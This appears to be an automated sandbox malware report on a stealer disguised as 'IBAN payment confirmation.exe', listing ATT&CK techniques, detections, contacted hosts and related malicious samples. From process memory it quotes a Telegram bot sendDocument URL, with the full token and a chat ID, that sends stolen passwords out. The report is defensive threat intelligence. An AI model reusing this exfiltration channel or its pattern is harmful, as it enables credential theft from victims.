            Source: Yara matchFile source: Process Memory Space: IBAN payment confirmation.exe PID: 3824, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API
            1
            DLL Side-Loading
            11
            Process Injection
            11
            Masquerading
            1
            OS Credential Dumping
            21
            Security Software Discovery
            Remote Services1
            Email Collection
            1
            Web Service
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            DLL Side-Loading
            31
            Disable or Modify Tools
            LSASS Memory31
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol1
            Archive Collected Data
            21
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
            Virtualization/Sandbox Evasion
            Security Account Manager1
            Application Window Discovery
            SMB/Windows Admin Shares1
            Data from Local System
            1
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
            Process Injection
            NTDS1
            System Network Configuration Discovery
            Distributed Component Object Model1
            Clipboard Data
            3
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information
            LSA Secrets2
            File and Directory Discovery
            SSHKeylogging14
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
            Obfuscated Files or Information
            Cached Domain Credentials215
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            IBAN payment confirmation.exe16%ReversingLabs
            IBAN payment confirmation.exe100%AviraHEUR/AGEN.1337946
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nsl71F.tmp\System.dll0%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://reallyfreegeoip.orgP0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            172.217.19.174
            truefalse
              high
              drive.usercontent.google.com
              142.250.181.1
              truefalse
                high
                reallyfreegeoip.org
                104.21.67.152
                truefalse
                  high
                  api.telegram.org
                  149.154.167.220
                  truefalse
                    high
                    checkip.dyndns.com
                    132.226.247.73
                    truefalse
                      high
                      checkip.dyndns.org
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        http://checkip.dyndns.org/false
                          high
                          https://reallyfreegeoip.org/xml/8.46.123.228false
                            high
                            https://api.telegram.org/bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.228false
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://www.google.comIBAN payment confirmation.exe, 0000000B.00000003.2127970360.0000000006AA8000.00000004.00000020.00020000.00000000.sdmp, IBAN payment confirmation.exe, 0000000B.00000003.2127970360.0000000006A66000.00000004.00000020.00020000.00000000.sdmp, IBAN payment confirmation.exe, 0000000B.00000003.2128063923.0000000006A66000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://reallyfreegeoip.orgPIBAN payment confirmation.exe, 0000000B.00000002.2529825283.0000000036FB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://api.telegram.orgIBAN payment confirmation.exe, 0000000B.00000002.2529825283.0000000037141000.00000004.00000800.00020000.00000000.sdmp, IBAN payment confirmation.exe, 0000000B.00000002.2529825283.000000003705A000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://api.telegram.org/botIBAN payment confirmation.exe, 0000000B.00000002.2529825283.000000003705A000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://translate.google.com/translate_a/element.jsIBAN payment confirmation.exe, 0000000B.00000003.2127970360.0000000006AA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://drive.google.com/4IBAN payment confirmation.exe, 0000000B.00000002.2509476832.00000000069F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://reallyfreegeoip.orgIBAN payment confirmation.exe, 0000000B.00000002.2529825283.0000000036FCC000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://api.telegram.org/bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065IBAN payment confirmation.exe, 0000000B.00000002.2529825283.000000003705A000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://reallyfreegeoip.orgIBAN payment confirmation.exe, 0000000B.00000002.2529825283.0000000036FB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://drive.usercontent.google.com/IBAN payment confirmation.exe, 0000000B.00000003.2179357888.0000000006A60000.00000004.00000020.00020000.00000000.sdmp, IBAN payment confirmation.exe, 0000000B.00000003.2179458705.0000000006A65000.00000004.00000020.00020000.00000000.sdmp, IBAN payment confirmation.exe, 0000000B.00000003.2146619589.0000000006A66000.00000004.00000020.00020000.00000000.sdmp, IBAN payment confirmation.exe, 0000000B.00000002.2509476832.0000000006A5F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                http://checkip.dyndns.orgIBAN payment confirmation.exe, 0000000B.00000002.2529825283.0000000037141000.00000004.00000800.00020000.00000000.sdmp, IBAN payment confirmation.exe, 0000000B.00000002.2529825283.000000003705A000.00000004.00000800.00020000.00000000.sdmp, IBAN payment confirmation.exe, 0000000B.00000002.2529825283.0000000036FB0000.00000004.00000800.00020000.00000000.sdmp, IBAN payment confirmation.exe, 0000000B.00000002.2529825283.0000000036F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://apis.google.comIBAN payment confirmation.exe, 0000000B.00000003.2127970360.0000000006AA8000.00000004.00000020.00020000.00000000.sdmp, IBAN payment confirmation.exe, 0000000B.00000003.2127970360.0000000006A66000.00000004.00000020.00020000.00000000.sdmp, IBAN payment confirmation.exe, 0000000B.00000003.2128063923.0000000006A66000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://checkip.dyndns.comIBAN payment confirmation.exe, 0000000B.00000002.2529825283.0000000037141000.00000004.00000800.00020000.00000000.sdmp, IBAN payment confirmation.exe, 0000000B.00000002.2529825283.0000000036FB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://nsis.sf.net/NSIS_ErrorErrorIBAN payment confirmation.exefalse
                                                        high
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePIBAN payment confirmation.exe, 0000000B.00000002.2529825283.0000000036F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://api.telegram.orgIBAN payment confirmation.exe, 0000000B.00000002.2529825283.0000000037141000.00000004.00000800.00020000.00000000.sdmp, IBAN payment confirmation.exe, 0000000B.00000002.2529825283.000000003705A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://drive.google.com/dIBAN payment confirmation.exe, 0000000B.00000002.2509476832.00000000069F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://reallyfreegeoip.org/xml/IBAN payment confirmation.exe, 0000000B.00000002.2529825283.0000000036FB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs
                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                149.154.167.220
                                                                api.telegram.orgUnited Kingdom
                                                                62041TELEGRAMRUfalse
                                                                142.250.181.1
                                                                drive.usercontent.google.comUnited States
                                                                15169GOOGLEUSfalse
                                                                104.21.67.152
                                                                reallyfreegeoip.orgUnited States
                                                                13335CLOUDFLARENETUSfalse
                                                                172.217.19.174
                                                                drive.google.comUnited States
                                                                15169GOOGLEUSfalse
                                                                132.226.247.73
                                                                checkip.dyndns.comUnited States
                                                                16989UTMEMUSfalse
                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1567427
                                                                Start date and time:2024-12-03 15:17:49 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 7m 24s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:14
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:IBAN payment confirmation.exe
                                                                Detection:MAL
                                                                Classification:mal100.troj.spyw.evad.winEXE@3/8@5/5
                                                                EGA Information:
                                                                • Successful, ratio: 100%
                                                                HCA Information:
                                                                • Successful, ratio: 96%
                                                                • Number of executed functions: 114
                                                                • Number of non-executed functions: 115
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe
                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                • VT rate limit hit for: IBAN payment confirmation.exe
                                                                TimeTypeDescription
                                                                10:42:37API Interceptor127x Sleep call for process: IBAN payment confirmation.exe modified
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                149.154.167.220Teklif Talebi- #U0130hale 14990_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  yMvZXcwN2OdoP6x.exeGet hashmaliciousDarkCloudBrowse
                                                                    NEW90FL0OtSHAz.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      https://connexion-espacesclients.support/gkm/Get hashmaliciousUnknownBrowse
                                                                        Pdf Reader.exeGet hashmaliciousStealeriumBrowse
                                                                          kelscrit.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                            Bank Swift and SOA PRN0072003410853_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                              https://dsiete.co/share.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                Itnaledi Salary_ Payslip _ Updates4C79949D7C31_pdf.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                  P#U0142atno#U015b#U0107 8557899,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    104.21.67.152NEW90FL0OtSHAz.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      QUOTATION_DECQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        RFQ-2309540_27112024.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          Cotizaci#U00f3n_Pedido_Manzanillo_MX.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            tA5DvuNwfQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              Factura.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                Gastroptosis (5).exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                  Fonts.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                    PO80330293.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      Ziraat_Swift.htaGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                        132.226.247.73NEW90FL0OtSHAz.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • checkip.dyndns.org/
                                                                                                        P#U0142atno#U015b#U0107 8557899,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • checkip.dyndns.org/
                                                                                                        HALKBANK EFT RECEIPT DATED 02.12.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                        • checkip.dyndns.org/
                                                                                                        tA5DvuNwfQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • checkip.dyndns.org/
                                                                                                        Factura.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                        • checkip.dyndns.org/
                                                                                                        021337ISOGENERAL.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                        • checkip.dyndns.org/
                                                                                                        PO80330293.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                        • checkip.dyndns.org/
                                                                                                        RYSUNEK_.EXE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • checkip.dyndns.org/
                                                                                                        MICROCHIP QFP3 22 - 25000.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • checkip.dyndns.org/
                                                                                                        RRT78-89079090GFVU0-INVRYU-FVIOJ0I.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                        • checkip.dyndns.org/
                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        checkip.dyndns.comTeklif Talebi- #U0130hale 14990_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 132.226.8.169
                                                                                                        NEW90FL0OtSHAz.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 193.122.130.0
                                                                                                        #U00d6denmeyen Kredi Taksit Bilgileriniz.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                        • 193.122.130.0
                                                                                                        kelscrit.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 158.101.44.242
                                                                                                        Bank Swift and SOA PRN0072003410853_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                        • 193.122.130.0
                                                                                                        P#U0142atno#U015b#U0107 8557899,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 132.226.247.73
                                                                                                        678763_PDF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 132.226.8.169
                                                                                                        HALKBANK EFT RECEIPT DATED 02.12.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                        • 132.226.247.73
                                                                                                        QUOTATION_DECQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                        • 158.101.44.242
                                                                                                        QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                        • 158.101.44.242
                                                                                                        reallyfreegeoip.orgTeklif Talebi- #U0130hale 14990_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 172.67.177.134
                                                                                                        NEW90FL0OtSHAz.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 104.21.67.152
                                                                                                        #U00d6denmeyen Kredi Taksit Bilgileriniz.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                        • 172.67.177.134
                                                                                                        kelscrit.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 172.67.177.134
                                                                                                        Bank Swift and SOA PRN0072003410853_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                        • 172.67.177.134
                                                                                                        P#U0142atno#U015b#U0107 8557899,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 172.67.177.134
                                                                                                        678763_PDF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 172.67.177.134
                                                                                                        HALKBANK EFT RECEIPT DATED 02.12.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                        • 172.67.177.134
                                                                                                        QUOTATION_DECQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                        • 104.21.67.152
                                                                                                        QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                        • 172.67.177.134
                                                                                                        api.telegram.orgTeklif Talebi- #U0130hale 14990_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 149.154.167.220
                                                                                                        yMvZXcwN2OdoP6x.exeGet hashmaliciousDarkCloudBrowse
                                                                                                        • 149.154.167.220
                                                                                                        NEW90FL0OtSHAz.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 149.154.167.220
                                                                                                        https://connexion-espacesclients.support/gkm/Get hashmaliciousUnknownBrowse
                                                                                                        • 149.154.167.220
                                                                                                        Pdf Reader.exeGet hashmaliciousStealeriumBrowse
                                                                                                        • 149.154.167.220
                                                                                                        kelscrit.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 149.154.167.220
                                                                                                        Bank Swift and SOA PRN0072003410853_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                        • 149.154.167.220
                                                                                                        https://dsiete.co/share.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 149.154.167.220
                                                                                                        Itnaledi Salary_ Payslip _ Updates4C79949D7C31_pdf.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 149.154.167.220
                                                                                                        P#U0142atno#U015b#U0107 8557899,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 149.154.167.220
                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        TELEGRAMRUTeklif Talebi- #U0130hale 14990_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 149.154.167.220
                                                                                                        yMvZXcwN2OdoP6x.exeGet hashmaliciousDarkCloudBrowse
                                                                                                        • 149.154.167.220
                                                                                                        NEW90FL0OtSHAz.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 149.154.167.220
                                                                                                        https://connexion-espacesclients.support/gkm/Get hashmaliciousUnknownBrowse
                                                                                                        • 149.154.167.220
                                                                                                        Pdf Reader.exeGet hashmaliciousStealeriumBrowse
                                                                                                        • 149.154.167.220
                                                                                                        kelscrit.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 149.154.167.220
                                                                                                        Bank Swift and SOA PRN0072003410853_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                        • 149.154.167.220
                                                                                                        https://dsiete.co/share.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 149.154.167.220
                                                                                                        Itnaledi Salary_ Payslip _ Updates4C79949D7C31_pdf.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 149.154.167.220
                                                                                                        P#U0142atno#U015b#U0107 8557899,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 149.154.167.220
                                                                                                        CLOUDFLARENETUSRef#1550238.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        • 104.26.13.205
                                                                                                        uC8FY7Hvsx.xlsGet hashmaliciousUnknownBrowse
                                                                                                        • 188.114.96.6
                                                                                                        BuMdSP88Ze.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        • 104.26.13.205
                                                                                                        uC8FY7Hvsx.xlsGet hashmaliciousUnknownBrowse
                                                                                                        • 172.67.194.230
                                                                                                        SANTANDER%20AUDITORIA.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        • 104.26.13.205
                                                                                                        uC8FY7Hvsx.xlsGet hashmaliciousUnknownBrowse
                                                                                                        • 188.114.97.6
                                                                                                        2112024_RS_GIBANJ -SWIFT.docx.docGet hashmaliciousUnknownBrowse
                                                                                                        • 172.67.194.230
                                                                                                        Pp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                                                                                                        • 172.67.201.49
                                                                                                        2112024_RS_GIBANJ -SWIFT.docx.docGet hashmaliciousUnknownBrowse
                                                                                                        • 188.114.97.6
                                                                                                        New Purchase Order.rtfGet hashmaliciousUnknownBrowse
                                                                                                        • 188.114.96.9
                                                                                                        UTMEMUSTeklif Talebi- #U0130hale 14990_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 132.226.8.169
                                                                                                        NEW90FL0OtSHAz.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 132.226.247.73
                                                                                                        P#U0142atno#U015b#U0107 8557899,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 132.226.247.73
                                                                                                        678763_PDF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 132.226.8.169
                                                                                                        HALKBANK EFT RECEIPT DATED 02.12.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                        • 132.226.247.73
                                                                                                        Cotizaci#U00f3n_Pedido_Manzanillo_MX.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                        • 132.226.8.169
                                                                                                        tA5DvuNwfQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 132.226.247.73
                                                                                                        Factura.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                        • 132.226.247.73
                                                                                                        Gastroptosis (5).exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                        • 132.226.8.169
                                                                                                        021337ISOGENERAL.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 132.226.247.73
                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        54328bd36c14bd82ddaa0c04b25ed9adTeklif Talebi- #U0130hale 14990_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 104.21.67.152
                                                                                                        NEW90FL0OtSHAz.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 104.21.67.152
                                                                                                        #U00d6denmeyen Kredi Taksit Bilgileriniz.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                        • 104.21.67.152
                                                                                                        kelscrit.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 104.21.67.152
                                                                                                        Bank Swift and SOA PRN0072003410853_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                        • 104.21.67.152
                                                                                                        P#U0142atno#U015b#U0107 8557899,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 104.21.67.152
                                                                                                        678763_PDF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 104.21.67.152
                                                                                                        HALKBANK EFT RECEIPT DATED 02.12.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                        • 104.21.67.152
                                                                                                        QUOTATION_DECQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                        • 104.21.67.152
                                                                                                        QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                        • 104.21.67.152
                                                                                                        3b5074b1b5d032e5620f69f9f700ff0eRef#1550238.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        • 149.154.167.220
                                                                                                        BuMdSP88Ze.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        • 149.154.167.220
                                                                                                        RFQ 9-XTC-204-60THD.xlsx.exeGet hashmaliciousQuasarBrowse
                                                                                                        • 149.154.167.220
                                                                                                        SANTANDER%20AUDITORIA.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        • 149.154.167.220
                                                                                                        Ref#1550238.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 149.154.167.220
                                                                                                        Bestellung - 021224 - 901003637.exeGet hashmaliciousQuasarBrowse
                                                                                                        • 149.154.167.220
                                                                                                        Teklif Talebi- #U0130hale 14990_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 149.154.167.220
                                                                                                        NEW90FL0OtSHAz.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 149.154.167.220
                                                                                                        1099833039444.pdf.jsGet hashmaliciousRemcosBrowse
                                                                                                        • 149.154.167.220
                                                                                                        https://nam05.safelinks.protection.outlook.com.url.atp-redirect.protected-forms.com/XTnQrajg1OGVHZkdSZC9jY09NbW40Z2plNHVuWDhsQVZRZkFYNVBxOWlTekFXSXBLSVRWLyt2WXhuS1hGNVo3UUxGQTRLRVpXNHpLSjVKdDEvbHJLSmtFWjMzbFIxb3IvR2xvdWJ1em5yeTJBK1FXdzF3UG52YXBaVmJBSEJZcXBSdjFvMTh6TmplRHV4azZ6UHkrTnM5dUY2QmVzbVFVRWk5di9PMEZxZ2lXNnM5N2tuOExqN1pyUy0tcEx5Q0xXTTBEOURyNFdnTS0tTTJJM3JGT2w2ZzQxTnorb2NMd1lrZz09?cid=2305347406Get hashmaliciousKnowBe4Browse
                                                                                                        • 149.154.167.220
                                                                                                        37f463bf4616ecd445d4a1937da06e19yMvZXcwN2OdoP6x.exeGet hashmaliciousDarkCloudBrowse
                                                                                                        • 142.250.181.1
                                                                                                        • 172.217.19.174
                                                                                                        Curri.lNK.lnkGet hashmaliciousUnknownBrowse
                                                                                                        • 142.250.181.1
                                                                                                        • 172.217.19.174
                                                                                                        36244920cQPUT1.lNK.lnkGet hashmaliciousUnknownBrowse
                                                                                                        • 142.250.181.1
                                                                                                        • 172.217.19.174
                                                                                                        1099833039444.pdf.jsGet hashmaliciousRemcosBrowse
                                                                                                        • 142.250.181.1
                                                                                                        • 172.217.19.174
                                                                                                        kelscrit.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 142.250.181.1
                                                                                                        • 172.217.19.174
                                                                                                        Bank Swift and SOA PRN0072003410853_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                        • 142.250.181.1
                                                                                                        • 172.217.19.174
                                                                                                        1013911.jsGet hashmaliciousFormBookBrowse
                                                                                                        • 142.250.181.1
                                                                                                        • 172.217.19.174
                                                                                                        cHtIyrhXeG.lnkGet hashmaliciousUnknownBrowse
                                                                                                        • 142.250.181.1
                                                                                                        • 172.217.19.174
                                                                                                        HiDOalUAfc.lnkGet hashmaliciousUnknownBrowse
                                                                                                        • 142.250.181.1
                                                                                                        • 172.217.19.174
                                                                                                        dFezsjdHtg.lnkGet hashmaliciousUnknownBrowse
                                                                                                        • 142.250.181.1
                                                                                                        • 172.217.19.174
                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        C:\Users\user\AppData\Local\Temp\nsl71F.tmp\System.dllBank Swift and SOA PRN0072003410853_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          WC10SCPMaX.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                                                                            PayeeAdvice_HK54912_R0038704_37504.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                              CL714440147.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                TKnBbCiX07.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                  ________.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                    Snurrevoddenes.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      Eksistensberettigelsernes102.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                        ALI HASSO - P02515 & P02518.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                          PRICE ENQUIRY - RFQ 6000073650.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                            Process:C:\Users\user\Desktop\IBAN payment confirmation.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1175563
                                                                                                                            Entropy (8bit):3.389619853796875
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12288:M8rRdGrEHQWmxJZy7gWKJkJz+uQyWpKJ:zfqmIBJkJatpK
                                                                                                                            MD5:E9467C0EB5305E8D1A4EE735AEC4A25D
                                                                                                                            SHA1:7E7AD95671E2E4C797D6BCB7DB014F453B4AF0C7
